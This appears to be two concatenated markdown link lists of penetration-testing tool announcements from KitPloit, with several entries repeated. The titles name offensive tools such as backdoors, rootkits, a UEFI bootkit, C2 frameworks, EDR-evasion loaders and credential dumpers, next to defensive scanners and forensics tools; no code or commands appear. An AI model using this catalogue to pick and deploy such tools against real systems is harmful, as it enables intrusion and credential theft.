- [Gowitness - A Golang, Web Screenshot Utility Using Chrome Headless](http://feedproxy.google.com/~r/PentestTools/~3/Y17_OJQnjrw/gowitness-golang-web-screenshot-utility.html)
- [Lsassy - Extract Credentials From Lsass Remotely](http://feedproxy.google.com/~r/PentestTools/~3/Mfhkp5fW17U/lsassy-extract-credentials-from-lsass.html)
- [LOLBITS - C# Reverse Shell Using Background Intelligent Transfer Service (BITS) As Communication Protocol](http://feedproxy.google.com/~r/PentestTools/~3/8qthCOAJoKw/lolbits-c-reverse-shell-using.html)
- [Shell Backdoor List - PHP / ASP Shell Backdoor List](http://feedproxy.google.com/~r/PentestTools/~3/4bTU5BSifCg/shell-backdoor-list-php-asp-shell.html)
- [Hakrawler - Simple, Fast Web Crawler Designed For Easy, Quick Discovery Of Endpoints And Assets Within A Web Application](http://feedproxy.google.com/~r/PentestTools/~3/8uHkviu3bCQ/hakrawler-simple-fast-web-crawler.html)
- [Gtfo - Search For Unix Binaries That Can Be Exploited To Bypass System Security Restrictions](http://feedproxy.google.com/~r/PentestTools/~3/vY14tKcJFoo/gtfo-search-for-unix-binaries-that-can.html)
- [SWFPFinder - SWF Potential Parameters Finder](http://feedproxy.google.com/~r/PentestTools/~3/oq6S3f4ZiN8/swfpfinder-swf-potential-parameters.html)
- [laravelN00b - Automated Scan .env Files And Checking Debug Mode In Victim Host](http://feedproxy.google.com/~r/PentestTools/~3/2gcvf8zseEA/laraveln00b-automated-scan-env-files.html)
- [Andriller - Software Utility With A Collection Of Forensic Tools For Smartphones](http://feedproxy.google.com/~r/PentestTools/~3/CGAtcMHkN58/andriller-software-utility-with.html)
- [LAVA - Large-scale Automated Vulnerability Addition](http://feedproxy.google.com/~r/PentestTools/~3/NcAB_2aw32k/lava-large-scale-automated.html)
- [Heapinspect - Inspect Heap In Python](http://feedproxy.google.com/~r/PentestTools/~3/IiCD14cYq24/heapinspect-inspect-heap-in-python.html)
- [CHAPS - Configuration Hardening Assessment PowerShell Script](http://feedproxy.google.com/~r/PentestTools/~3/5KGQldrk1HE/chaps-configuration-hardening.html)
- [Karonte - A Static Analysis Tool To Detect Multi-Binary Vulnerabilities In Embedded Firmware](http://feedproxy.google.com/~r/PentestTools/~3/Id6YHzVv09A/karonte-static-analysis-tool-to-detect.html)
- [IotShark - Monitoring And Analyzing IoT Traffic](http://feedproxy.google.com/~r/PentestTools/~3/PeNmS58306Q/iotshark-monitoring-and-analyzing-iot.html)
- [LNAV - Log File Navigator](http://feedproxy.google.com/~r/PentestTools/~3/3vkEu05vBmw/lnav-log-file-navigator.html)
- [TuxResponse - Linux Incident Response](http://feedproxy.google.com/~r/PentestTools/~3/XkMJJaEjx_Q/tuxresponse-linux-incident-response.html)
- [Stowaway - Multi-hop Proxy Tool For Pentesters](http://feedproxy.google.com/~r/PentestTools/~3/YKyUkJguG1o/stowaway-multi-hop-proxy-tool-for.html)
- [Git-Vuln-Finder - Finding Potential Software Vulnerabilities From Git Commit Messages](http://feedproxy.google.com/~r/PentestTools/~3/6trl3SIo3BM/git-vuln-finder-finding-potential.html)
- [WAFW00F v2.0 - Allows One To Identify And Fingerprint Web Application Firewall (WAF) Products Protecting A Website](http://feedproxy.google.com/~r/PentestTools/~3/x0wBL8NRXaE/wafw00f-v20-allows-one-to-identify-and.html)
- [XposedOrNot - Tool To Search An Aggregated Repository Of Xposed Passwords Comprising Of ~850 Million Real Time Passwords](http://feedproxy.google.com/~r/PentestTools/~3/djD79KVqJpY/xposedornot-tool-to-search-aggregated.html)
- [Dsync - IDAPython Plugin That Synchronizes Disassembler And Decompiler Views](http://feedproxy.google.com/~r/PentestTools/~3/cTZCZAOl5ZY/dsync-idapython-plugin-that.html)
- [RFCpwn - An Enumeration And Exploitation Toolkit Using RFC Calls To SAP](http://feedproxy.google.com/~r/PentestTools/~3/SxCeVp5LrPY/rfcpwn-enumeration-and-exploitation.html)
- [LKWA - Lesser Known Web Attack Lab](http://feedproxy.google.com/~r/PentestTools/~3/_D8J5ofnkjc/lkwa-lesser-known-web-attack-lab.html)
- [Multiscanner - Modular File Scanning/Analysis Framework](http://feedproxy.google.com/~r/PentestTools/~3/JCWYObLaesQ/multiscanner-modular-file.html)
- [Findomain v0.9.3 - The Fastest And Cross-Platform Subdomain Enumerator](http://feedproxy.google.com/~r/PentestTools/~3/F8FCuzzp1eY/findomain-v093-fastest-and-cross.html)
- [OKadminFinder - Admin Panel Finder / Admin Login Page Finder](http://feedproxy.google.com/~r/PentestTools/~3/Wy3OcRdb1pk/okadminfinder-admin-panel-finder-admin.html)
- [BetterBackdoor - A Backdoor With A Multitude Of Features](http://feedproxy.google.com/~r/PentestTools/~3/fnQYMC92Af4/betterbackdoor-backdoor-with-multitude.html)
- [Spraykatz - A Tool Able To Retrieve Credentials On Windows Machines And Large Active Directory Environments](http://feedproxy.google.com/~r/PentestTools/~3/hk7FN1evtJ4/spraykatz-tool-able-to-retrieve.html)
- [Shelly - Simple Backdoor Manager With Python (Based On Weevely)](http://feedproxy.google.com/~r/PentestTools/~3/Oof3oJ5ys_U/shelly-simple-backdoor-manager-with.html)
- [huskyCI - Performing Security Tests Inside Your CI](http://feedproxy.google.com/~r/PentestTools/~3/PCjfmxm5mk0/huskyci-performing-security-tests.html)
- [AttackSurfaceMapper - A Tool That Aims To Automate The Reconnaissance Process](http://feedproxy.google.com/~r/PentestTools/~3/BaoKl5m0_Zg/attacksurfacemapper-tool-that-aims-to.html)
- [Pylane - An Python VM Injector With Debug Tools, Based On GDB](http://feedproxy.google.com/~r/PentestTools/~3/NXSFocHtf4w/pylane-python-vm-injector-with-debug.html)
- [PAKURI - Penetration Test Achieve Knowledge Unite Rapid Interface](http://feedproxy.google.com/~r/PentestTools/~3/Mi6WN2Gybmo/pakuri-penetration-test-achieve.html)
- [Malwinx - Just A Normal Flask Web App To Understand Win32Api With Code Snippets And References](http://feedproxy.google.com/~r/PentestTools/~3/uJtIDU0fedk/malwinx-just-normal-flask-web-app-to.html)
- [Quark-Engine - An Obfuscation-Neglect Android Malware Scoring System](http://feedproxy.google.com/~r/PentestTools/~3/utzP6iBfGHg/quark-engine-obfuscation-neglect.html)
- [nmapAutomator - Tool To Automate All Of The Process Of Recon/Enumeration](http://feedproxy.google.com/~r/PentestTools/~3/E4Iu0NnZ68s/nmapautomator-tool-to-automate-all-of.html)
- [RansomCoin - A DFIR Tool To Extract Cryptocoin Addresses And Other Indicators Of Compromise From Binaries](http://feedproxy.google.com/~r/PentestTools/~3/GvziPKgW9H8/ransomcoin-dfir-tool-to-extract.html)
- [Pown.js - A Security Testing An Exploitation Toolkit Built On Top Of Node.js And NPM](http://feedproxy.google.com/~r/PentestTools/~3/d6N6weN0Sls/pownjs-security-testing-exploitation.html)
- [Top 20 Most Popular Hacking Tools in 2019](http://feedproxy.google.com/~r/PentestTools/~3/nlQ2cTwvBWU/top-20-most-popular-hacking-tools-in.html)
- [Turbolist3r - Subdomain Enumeration Tool With Analysis Features For Discovered Domains](http://feedproxy.google.com/~r/PentestTools/~3/N2YrQhf-ZQA/turbolist3r-subdomain-enumeration-tool.html)
- [SQLMap v1.4 - Automatic SQL Injection And Database Takeover Tool](http://feedproxy.google.com/~r/PentestTools/~3/E9qL_gItzM0/sqlmap-v14-automatic-sql-injection-and.html)
- [AVCLASS++ - Yet Another Massive Malware Labeling Tool](http://feedproxy.google.com/~r/PentestTools/~3/grHx9mKrtYw/avclass-yet-another-massive-malware.html)
- [XSpear v1.3 - Powerfull XSS Scanning And Parameter Analysis Tool](http://feedproxy.google.com/~r/PentestTools/~3/bznAwae962s/xspear-v13-powerfull-xss-scanning-and.html)
- [Kamerka GUI - Ultimate Internet Of Things/Industrial Control Systems Reconnaissance Tool](http://feedproxy.google.com/~r/PentestTools/~3/VXVdUp5N_VE/kamerka-gui-ultimate-internet-of.html)
- [SysWhispers - AV/EDR Evasion Via Direct System Calls](http://feedproxy.google.com/~r/PentestTools/~3/WdlNh76UZmY/syswhispers-avedr-evasion-via-direct.html)
- [S3Tk - A Security Toolkit For Amazon S3](http://feedproxy.google.com/~r/PentestTools/~3/I-t2K2h-_nM/s3tk-security-toolkit-for-amazon-s3.html)
- [WindowsFirewallRuleset - Windows Firewall Ruleset Powershell Scripts](http://feedproxy.google.com/~r/PentestTools/~3/k141Im4eB3o/windowsfirewallruleset-windows-firewall.html)
- [AWS Report - Tool For Analyzing Amazon Resources](http://feedproxy.google.com/~r/PentestTools/~3/SAdoyWAz1c4/aws-report-tool-for-analyzing-amazon.html)
- [Tishna - Complete Automated Pentest Framework For Servers, Application Layer To Web Security](http://feedproxy.google.com/~r/PentestTools/~3/3wBSl0rNph4/tishna-complete-automated-pentest.html)
- [RedPeanut - A Small RAT Developed In .Net Core 2 And Its Agent In .Net 3.5/4.0](http://feedproxy.google.com/~r/PentestTools/~3/UUoNVH2ftOs/redpeanut-small-rat-developed-in-net.html)
- [DetectionLab - Vagrant And Packer Scripts To Build A Lab Environment Complete With Security Tooling And Logging Best Practices](http://feedproxy.google.com/~r/PentestTools/~3/wfG0ntJ0tYI/detectionlab-vagrant-and-packer-scripts.html)
- [Andor - Blind SQL Injection Tool With Golang](http://feedproxy.google.com/~r/PentestTools/~3/zATm4I4cspQ/andor-blind-sql-injection-tool-with.html)
- [SQL Injection Payload List](http://feedproxy.google.com/~r/PentestTools/~3/ayR6sAbbWFM/sql-injection-payload-list.html)
- [WinPwn - Automation For Internal Windows Penetrationtest / AD-Security](http://feedproxy.google.com/~r/PentestTools/~3/-4Y4QPv6370/winpwn-automation-for-internal-windows.html)
- [Ddoor - Cross Platform Backdoor Using Dns Txt Records](http://feedproxy.google.com/~r/PentestTools/~3/lT6QmCTiWZI/ddoor-cross-platform-backdoor-using-dns.html)
- [Custom Header - Automatic Add New Header To Entire BurpSuite HTTP Requests](http://feedproxy.google.com/~r/PentestTools/~3/FrRisehI7Hw/custom-header-automatic-add-new-header.html)
- [SCShell - Fileless Lateral Movement Tool That Relies On ChangeServiceConfigA To Run Command](http://feedproxy.google.com/~r/PentestTools/~3/X10EwvOx9PQ/scshell-fileless-lateral-movement-tool.html)
- [Ultimate Facebook Scraper - A Bot Which Scrapes Almost Everything About A Facebook User'S Profile Including All Public Posts/Statuses Available On The User'S Timeline, Uploaded Photos, Tagged Photos, Videos, Friends List And Their Profile Photos](http://feedproxy.google.com/~r/PentestTools/~3/gp_DtiGu_sY/ultimate-facebook-scraper-bot-which.html)
- [FireProx - AWS API Gateway Management Tool For Creating On The Fly HTTP Pass-Through Proxies For Unique IP Rotation](http://feedproxy.google.com/~r/PentestTools/~3/TkQaYYrkjO8/fireprox-aws-api-gateway-management.html)
- [DNCI - Dot Net Code Injector](http://feedproxy.google.com/~r/PentestTools/~3/Ji5q7TQco-c/dnci-dot-net-code-injector.html)
- [RdpThief - Extracting Clear Text Passwords From Mstsc.Exe Using API Hooking](http://feedproxy.google.com/~r/PentestTools/~3/_16Af6YgVU4/rdpthief-extracting-clear-text.html)
- [Leprechaun - Tool Used To Map Out The Network Data Flow To Help Penetration Testers Identify Potentially Valuable Targets](http://feedproxy.google.com/~r/PentestTools/~3/6JmHURb1L1E/leprechaun-tool-used-to-map-out-network.html)
- [Glances - An Eye On Your System. A Top/Htop Alternative For GNU/Linux, BSD, Mac OS And Windows Operating Systems](http://feedproxy.google.com/~r/PentestTools/~3/Bi11t3vQPXc/glances-eye-on-your-system-tophtop.html)
- [Sshtunnel - SSH Tunnels To Remote Server](http://feedproxy.google.com/~r/PentestTools/~3/6M8Oysn80ZY/sshtunnel-ssh-tunnels-to-remote-server.html)
- [RE:TERNAL - Repo Containing Docker-Compose Files And Setup Scripts Without Having To Clone The Individual Reternal Components](http://feedproxy.google.com/~r/PentestTools/~3/IYzPV_tA-XI/reternal-repo-containing-docker-compose.html)
- [Antispy - A Free But Powerful Anti Virus And Rootkits Toolkit](http://feedproxy.google.com/~r/PentestTools/~3/XkcKtXVulps/antispy-free-but-powerful-anti-virus.html)
- [Flan - A Pretty Sweet Vulnerability Scanner By CloudFlare](http://feedproxy.google.com/~r/PentestTools/~3/6-Bh9w3dbPk/flan-pretty-sweet-vulnerability-scanner.html)
- [Corsy - CORS Misconfiguration Scanner](http://feedproxy.google.com/~r/PentestTools/~3/0C7E2QC4myo/corsy-cors-misconfiguration-scanner.html)
- [Kali Linux 2019.4 Release - Penetration Testing and Ethical Hacking Linux Distribution](http://feedproxy.google.com/~r/PentestTools/~3/l8pYhW33fno/kali-linux-20194-release-penetration.html)
- [XML External Entity (XXE) Injection Payload List](http://feedproxy.google.com/~r/PentestTools/~3/eAuCIbT3oBk/xml-external-entity-xxe-injection.html)
- [ATFuzzer - Dynamic Analysis Of AT Interface For Android Smartphones](http://feedproxy.google.com/~r/PentestTools/~3/OL4U89ASYkU/atfuzzer-dynamic-analysis-of-at.html)
- [Netstat2Neo4J - Create Cypher Create Statements For Neo4J Out Of Netstat Files From Multiple Machines](http://feedproxy.google.com/~r/PentestTools/~3/3d0Xl5zLmqY/netstat2neo4j-create-cypher-create.html)
- [BaseQuery - A Way To Organize Public Combo-Lists And Leaks In A Way That You Can Easily Search Through Everything](http://feedproxy.google.com/~r/PentestTools/~3/xagTe4W9uT4/basequery-way-to-organize-public-combo.html)
- [Attack Monitor - Endpoint Detection And Malware Analysis Software](http://feedproxy.google.com/~r/PentestTools/~3/_RxX4yOr-Ts/attack-monitor-endpoint-detection-and.html)
- [Crashcast-Exploit - This Tool Allows You Mass Play Any YouTube Video With Chromecasts Obtained From Shodan.io](http://feedproxy.google.com/~r/PentestTools/~3/xeXSGXnN_xA/crashcast-exploit-this-tool-allows-you.html)
- [Tool-X - A Kali Linux Hacking Tool Installer](http://feedproxy.google.com/~r/PentestTools/~3/JqzGZm7j4JQ/tool-x-kali-linux-hacking-tool-installer.html)
- [SQLMap v1.3 - Automatic SQL Injection And Database Takeover Tool](http://feedproxy.google.com/~r/PentestTools/~3/RNZTk3qTooc/sqlmap-v13-automatic-sql-injection-and.html)
- [Stretcher - Tool Designed To Help Identify Open Elasticsearch Servers That Are Exposing Sensitive Information](http://feedproxy.google.com/~r/PentestTools/~3/PdXu9zuRDIg/stretcher-tool-designed-to-help.html)
- [Aztarna - A Footprinting Tool For Robots](http://feedproxy.google.com/~r/PentestTools/~3/Q9CYfShlqRA/aztarna-footprinting-tool-for-robots.html)
- [Hediye - Hash Generator & Cracker Online Offline](http://feedproxy.google.com/~r/PentestTools/~3/p0oO5qBUFoI/hediye-hash-generator-cracker-online.html)
- [Killcast - Manipulate Chromecast Devices In Your Network](http://feedproxy.google.com/~r/PentestTools/~3/rMCHdNb3sTI/killcast-manipulate-chromecast-devices.html)
- [bypass-firewalls-by-DNS-history - Firewall Bypass Script Based On DNS History Records](http://feedproxy.google.com/~r/PentestTools/~3/4GvtphGIZmM/bypass-firewalls-by-dns-history.html)
- [WiFi-Pumpkin v0.8.7 - Framework for Rogue Wi-Fi Access Point Attack](http://feedproxy.google.com/~r/PentestTools/~3/HogR4BTI3tM/wifi-pumpkin-v087-framework-for-rogue.html)
- [H8Mail - Email OSINT And Password Breach Hunting](http://feedproxy.google.com/~r/PentestTools/~3/u6x3-7n6oMI/h8mail-email-osint-and-password-breach.html)
- [Kube-Hunter - Hunt For Security Weaknesses In Kubernetes Clusters](http://feedproxy.google.com/~r/PentestTools/~3/Dr1bT8peAAc/kube-hunter-hunt-for-security.html)
- [Metasploit 5.0 - The World’s Most Used Penetration Testing Framework](http://feedproxy.google.com/~r/PentestTools/~3/WdwaF60VaxA/metasploit-50-worlds-most-used.html)
- [Interlace - Easily Turn Single Threaded Command Line Applications Into Fast, Multi Threaded Ones With CIDR And Glob Support](http://feedproxy.google.com/~r/PentestTools/~3/WogS-qr4dno/interlace-easily-turn-single-threaded.html)
- [Twifo-Cli - Get User Information Of A Twitter User](http://feedproxy.google.com/~r/PentestTools/~3/Sbc3gunRkBE/twifo-cli-get-user-information-of.html)
- [Sitadel - Web Application Security Scanner](http://feedproxy.google.com/~r/PentestTools/~3/zfPWuXefLsw/sitadel-web-application-security-scanner.html)
- [Pe-Sieve - Recognizes And Dumps A Variety Of Potentially Malicious Implants (Replaced/Injected PEs, Shellcodes, Hooks, In-Memory Patches)](http://feedproxy.google.com/~r/PentestTools/~3/MV1mlXFmkpg/pe-sieve-recognizes-and-dumps-variety.html)
- [Malboxes - Builds Malware Analysis Windows VMs So That You Don'T Have To](http://feedproxy.google.com/~r/PentestTools/~3/sZXmRx1pB7E/malboxes-builds-malware-analysis.html)
- [Snyk - CLI And Build-Time Tool To Find & Fix Known Vulnerabilities In Open-Source Dependencies](http://feedproxy.google.com/~r/PentestTools/~3/elMWRHLI054/snyk-cli-and-build-time-tool-to-find.html)
- [Shed - .NET Runtime Inspector](http://feedproxy.google.com/~r/PentestTools/~3/byWGTLrRRMA/shed-net-runtime-inspector.html)
- [Stardox - Github Stargazers Information Gathering Tool](http://feedproxy.google.com/~r/PentestTools/~3/kAWqztoZ97E/stardox-github-stargazers-information.html)
- [Commix v2.7 - Automated All-in-One OS Command Injection And Exploitation Tool](http://feedproxy.google.com/~r/PentestTools/~3/mjOk7rQhp2Y/commix-v27-automated-all-in-one-os.html)
- [AutoSploit v3.0 - Automated Mass Exploiter](http://feedproxy.google.com/~r/PentestTools/~3/nDoUfG2uHQg/autosploit-v30-automated-mass-exploiter.html)
- [Faraday v3.5 - Collaborative Penetration Test and Vulnerability Management Platform](http://feedproxy.google.com/~r/PentestTools/~3/Fq1vFkcIIFI/faraday-v35-collaborative-penetration.html)
- [Recaf - A Modern Java Bytecode Editor](http://feedproxy.google.com/~r/PentestTools/~3/mAzq3GzpHIg/recaf-modern-java-bytecode-editor.html)
- [dnSpy - .NET Debugger And Assembly Editor](http://feedproxy.google.com/~r/PentestTools/~3/JZaPW594CQE/dnspy-net-debugger-and-assembly-editor.html) |
Markdown | h4cker/new_tools.md | # Latest Cool Tools
The following are a collection of recently-released pen test tools. I update this list every time that there is a new post and when I find a new one around the Internet. The rest of the repository has hundreds of additional cybersecurity and pen test tools.
----
- [ScrapPY - A Python Utility For Scraping Manuals, Documents, And Other Sensitive PDFs To Generate Wordlists That Can Be Utilized By Offensive Security Tools](http://www.kitploit.com/2023/07/scrappy-python-utility-for-scraping.html)
- [Wanderer - An Open-Source Process Injection Enumeration Tool Written In C#](http://www.kitploit.com/2023/07/wanderer-open-source-process-injection.html)
- [Polaris - Validation Of Best Practices In Your Kubernetes Clusters](http://www.kitploit.com/2023/07/polaris-validation-of-best-practices-in.html)
- [Bropper - An Automatic Blind ROP Exploitation Tool](http://www.kitploit.com/2023/07/bropper-automatic-blind-rop.html)
- [Golddigger - Search Files For Gold](http://www.kitploit.com/2023/06/golddigger-search-files-for-gold.html)
- [Artemis - A Modular Web Reconnaissance Tool And Vulnerability Scanner](http://www.kitploit.com/2023/06/artemis-modular-web-reconnaissance-tool.html)
- [ReconAIzer - A Burp Suite Extension To Add OpenAI (GPT) On Burp And Help You With Your Bug Bounty Recon To Discover Endpoints, Params, URLs, Subdomains And More!](http://www.kitploit.com/2023/06/reconaizer-burp-suite-extension-to-add.html)
- [HardHatC2 - A C# Command And Control Framework](http://www.kitploit.com/2023/06/hardhatc2-c-command-and-control.html)
- [Gato - GitHub Self-Hosted Runner Enumeration And Attack Tool](http://www.kitploit.com/2023/06/gato-github-self-hosted-runner.html)
- [msLDAPDump - LDAP Enumeration Tool](http://www.kitploit.com/2023/06/msldapdump-ldap-enumeration-tool.html)
- [Certsync - Dump NTDS With Golden Certificates And UnPAC The Hash](http://www.kitploit.com/2023/06/certsync-dump-ntds-with-golden.html)
- [EndExt - Go Tool For Extracting All The Possible Endpoints From The JS Files](http://www.kitploit.com/2023/06/endext-go-tool-for-extracting-all.html)
- [Scanner-and-Patcher - A Web Vulnerability Scanner And Patcher](http://www.kitploit.com/2023/06/scanner-and-patcher-web-vulnerability.html)
- [Handle-Ripper - Windows Handle Hijacker](http://www.kitploit.com/2023/06/handle-ripper-windows-handle-hijacker.html)
- [Forensia - Anti Forensics Tool For Red Teamers, Used For Erasing Footprints In The Post Exploitation Phase](http://www.kitploit.com/2023/06/forensia-anti-forensics-tool-for-red.html)
- [LSMS - Linux Security And Monitoring Scripts](http://www.kitploit.com/2023/06/lsms-linux-security-and-monitoring.html)
- [Firefly - Black Box Fuzzer For Web Applications](http://www.kitploit.com/2023/06/firefly-black-box-fuzzer-for-web.html)
- [BackupOperatorToolkit - The BackupOperatorToolkit Contains Different Techniques Allowing You To Escalate From Backup Operator To Domain Admin](http://www.kitploit.com/2023/06/backupoperatortoolkit.html)
- [Killer - Is A Tool Created To Evade AVs And EDRs Or Security Tools](http://www.kitploit.com/2023/06/killer-is-tool-created-to-evade-avs-and.html)
- [Fiber - Using Fibers To Run In-Memory Code In A Different And Stealthy Way](http://www.kitploit.com/2023/06/fiber-using-fibers-to-run-in-memory.html)
- [Burpgpt - A Burp Suite Extension That Integrates OpenAI's GPT To Perform An Additional Passive Scan For Discovering Highly Bespoke Vulnerabilities, And Enables Running Traffic-Based Analysis Of Any Type](http://www.kitploit.com/2023/06/burpgpt-burp-suite-extension-that.html)
- [C2-Hunter - Extract C2 Traffic](http://www.kitploit.com/2023/06/c2-hunter-extract-c2-traffic.html)
- [Bypass-Sandbox-Evasion - Bypass Malware Sandbox Evasion Ram Check](http://www.kitploit.com/2023/06/bypass-sandbox-evasion-bypass-malware.html)
- [PythonMemoryModule - Pure-Python Implementation Of MemoryModule Technique To Load Dll And Unmanaged Exe Entirely From Memory](http://www.kitploit.com/2023/06/pythonmemorymodule-pure-python.html)
- [XSS-Exploitation-Tool - An XSS Exploitation Tool](http://www.kitploit.com/2023/06/xss-exploitation-tool-xss-exploitation.html)
- [Kali Linux 2023.2 - Penetration Testing and Ethical Hacking Linux Distribution](http://www.kitploit.com/2023/06/kali-linux-20232-penetration-testing.html)
- [AtomLdr - A DLL Loader With Advanced Evasive Features](http://www.kitploit.com/2023/06/atomldr-dll-loader-with-advanced.html)
- [LinkedInDumper - Tool To Dump Company Employees From LinkedIn API](http://www.kitploit.com/2023/06/linkedindumper-tool-to-dump-company.html)
- [Kubestroyer - Kubernetes Exploitation Tool](http://www.kitploit.com/2023/06/kubestroyer-kubernetes-exploitation-tool.html)
- [DCVC2 - A Golang Discord C2 Unlike Any Other](http://www.kitploit.com/2023/06/dcvc2-golang-discord-c2-unlike-any-other.html)
- [MAAD-AF - MAAD Attack Framework - An Attack Tool For Simple, Fast And Effective Security Testing Of M365 And Azure AD](http://www.kitploit.com/2023/06/maad-af-maad-attack-framework-attack.html)
- [Burp-Dom-Scanner - Burp Suite's Extension To Scan And Crawl Single Page Applications](http://www.kitploit.com/2023/06/burp-dom-scanner-burp-suites-extension.html)
- [Graphcat - Generate Graphs And Charts Based On Password Cracking Result](http://www.kitploit.com/2023/06/graphcat-generate-graphs-and-charts.html)
- [Azure-AccessPermissions - Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment](http://www.kitploit.com/2023/06/azure-accesspermissions-easy-to-use.html)
- [Nidhogg - All-In-One Simple To Use Rootkit For Red Teams](http://www.kitploit.com/2023/05/nidhogg-all-in-one-simple-to-use.html)
- [rebindMultiA - Tool To Perform a Multiple A Record Rebind Attack](http://www.kitploit.com/2023/05/rebindmultia-tool-to-perform-multiple.html)
- [EntropyReducer - Reduce Entropy And Obfuscate Youre Payload With Serialized Linked Lists](http://www.kitploit.com/2023/05/entropyreducer-reduce-entropy-and.html)
- [Platbox - UEFI And SMM Assessment Tool](http://www.kitploit.com/2023/05/platbox-uefi-and-smm-assessment-tool.html)
- [Bootlicker - A Generic UEFI Bootkit Used To Achieve Initial Usermode Execution](http://www.kitploit.com/2023/05/bootlicker-generic-uefi-bootkit-used-to.html)
- [PentestGPT - A GPT-empowered Penetration Testing Tool](http://www.kitploit.com/2023/05/pentestgpt-gpt-empowered-penetration.html)
- [GodPotato - Local Privilege Escalation Tool From A Windows Service Accounts To NT AUTHORITY\SYSTEM](http://www.kitploit.com/2023/05/godpotato-local-privilege-escalation.html)
- [PentestGPT - A GPT-empowered Penetration Testing Tool](https://www.kitploit.com/2023/05/pentestgpt-gpt-empowered-penetration.html)
- [Bootlicker - A Generic UEFI Bootkit Used To Achieve Initial Usermode Execution](https://www.kitploit.com/2023/05/bootlicker-generic-uefi-bootkit-used-to.html)
- [Platbox - UEFI And SMM Assessment Tool](https://www.kitploit.com/2023/05/platbox-uefi-and-smm-assessment-tool.html)
- [EntropyReducer - Reduce Entropy And Obfuscate Youre Payload With Serialized Linked Lists](https://www.kitploit.com/2023/05/entropyreducer-reduce-entropy-and.html)
- [REcollapse Is A Helper Tool For Black-Box Regex Fuzzing To Bypass Validations And Discover Normalizations In Web Applications](https://www.kitploit.com/2023/05/recollapse-is-helper-tool-for-black-box.html)
- [hardCIDR - Linux Bash Script To Discover The Netblocks, Or Ranges, Owned By The Target Organization](https://www.kitploit.com/2023/03/hardcidr-linux-bash-script-to-discover.html)
- [Metlo - An Open-Source API Security Platform](https://www.kitploit.com/2023/05/metlo-open-source-api-security-platform.html)
- [Teler-Waf - A Go HTTP Middleware That Provides Teler IDS Functionality To Protect Against Web-Based Attacks And Improve The Security Of Go-based Web Applications](https://www.kitploit.com/2023/05/teler-waf-go-http-middleware-that.html)
- [Spartacus - DLL Hijacking Discovery Tool](https://www.kitploit.com/2023/05/spartacus-dll-hijacking-discovery-tool.html)
- [Fuzztruction - Prototype Of A Fuzzer That Does Not Directly Mutate Inputs (As Most Fuzzers Do) But Instead Uses A So-Called Generator Application To Produce An Input For Our Fuzzing Target](https://www.kitploit.com/2023/05/fuzztruction-prototype-of-fuzzer-that.html)
- [NTLMRecon - A Tool For Performing Light Brute-Forcing Of HTTP Servers To Identify Commonly Accessible NTLM Authentication Endpoints](https://www.kitploit.com/2023/05/ntlmrecon-tool-for-performing-light.html)
- [Nimbo-C2 - Yet Another (Simple And Lightweight) C2 Framework](https://www.kitploit.com/2023/05/nimbo-c2-yet-another-simple-and.html)
- [Domain-Protect - OWASP Domain Protect - Prevent Subdomain Takeover](https://www.kitploit.com/2023/05/domain-protect-owasp-domain-protect.html)
- [SpiderSuite - Advance Web Spider/Crawler For Cyber Security Professionals](https://www.kitploit.com/2023/05/spidersuite-advance-web-spidercrawler.html)
- [Indicator-Intelligence - Finds Related Domains And IPv4 Addresses To Do Threat Intelligence After Indicator-Intelligence Collects Static Files](https://www.kitploit.com/2023/05/indicator-intelligence-finds-related.html)
- [TLDHunt - Domain Availability Checker](https://www.kitploit.com/2023/05/tldhunt-domain-availability-checker.html)
- [Lfi-Space - LFI Scan Tool](https://www.kitploit.com/2023/05/lfi-space-lfi-scan-tool.html)
- [PassMute - PassMute - A Multi Featured Password Transmutation/Mutator Tool](https://www.kitploit.com/2023/05/passmute-passmute-multi-featured.html)
- [ShadowSpray - A Tool To Spray Shadow Credentials Across An Entire Domain In Hopes Of Abusing Long Forgotten GenericWrite/GenericAll DACLs Over Other Objects In The Domain](https://www.kitploit.com/2023/05/shadowspray-tool-to-spray-shadow.html)
- [Cbrutekrag - Penetration Tests On SSH Servers Using Brute Force Or Dictionary Attacks. Written In C](https://www.kitploit.com/2023/05/cbrutekrag-penetration-tests-on-ssh.html)
- [RustChain - Hide Memory Artifacts Using ROP And Hardware Breakpoints](https://www.kitploit.com/2023/05/rustchain-hide-memory-artifacts-using.html)
- [Wafaray - Enhance Your Malware Detection With WAF + YARA (WAFARAY)](https://www.kitploit.com/2023/05/wafaray-enhance-your-malware-detection.html)
- [KoodousFinder - A Simple Tool To Allows Users To Search For And Analyze Android Apps For Potential Security Threats And Vulnerabilities](https://www.kitploit.com/2023/05/koodousfinder-simple-tool-to-allows.html)
- [Dumpulator - An Easy-To-Use Library For Emulating Memory Dumps. Useful For Malware Analysis (Config Extraction, Unpacking) And Dynamic Analysis In General (Sandboxing)](https://www.kitploit.com/2023/05/dumpulator-easy-to-use-library-for.html)
- [Bypass-403 - A Simple Script Just Made For Self Use For Bypassing 403](https://www.kitploit.com/2023/05/bypass-403-simple-script-just-made-for.html)
- [Hades - Go Shellcode Loader That Combines Multiple Evasion Techniques](https://www.kitploit.com/2023/05/hades-go-shellcode-loader-that-combines.html)
- [Acheron - Indirect Syscalls For AV/EDR Evasion In Go Assembly](https://www.kitploit.com/2023/05/acheron-indirect-syscalls-for-avedr.html)
- [Jsfinder - Fetches JavaScript Files Quickly And Comprehensively](https://www.kitploit.com/2023/05/jsfinder-fetches-javascript-files.html)
- [rebindMultiA - Tool To Perform a Multiple A Record Rebind Attack](https://www.kitploit.com/2023/05/rebindmultia-tool-to-perform-multiple.html)
- [Jsfinder - Fetches JavaScript Files Quickly And Comprehensively](https://www.kitploit.com/2023/05/jsfinder-fetches-javascript-files.html)
- [Acheron - Indirect Syscalls For AV/EDR Evasion In Go Assembly](https://www.kitploit.com/2023/05/acheron-indirect-syscalls-for-avedr.html)
- [Hades - Go Shellcode Loader That Combines Multiple Evasion Techniques](http://www.kitploit.com/2023/05/hades-go-shellcode-loader-that-combines.html)
- [Bypass-403 - A Simple Script Just Made For Self Use For Bypassing 403](https://www.kitploit.com/2023/05/bypass-403-simple-script-just-made-for.html)
- [Dumpulator - An Easy-To-Use Library For Emulating Memory Dumps. Useful For Malware Analysis (Config Extraction, Unpacking) And Dynamic Analysis In General (Sandboxing)](https://www.kitploit.com/2023/05/dumpulator-easy-to-use-library-for.html)
- [Cbrutekrag - Penetration Tests On SSH Servers Using Brute Force Or Dictionary Attacks. Written In C](https://www.kitploit.com/2023/05/cbrutekrag-penetration-tests-on-ssh.html)
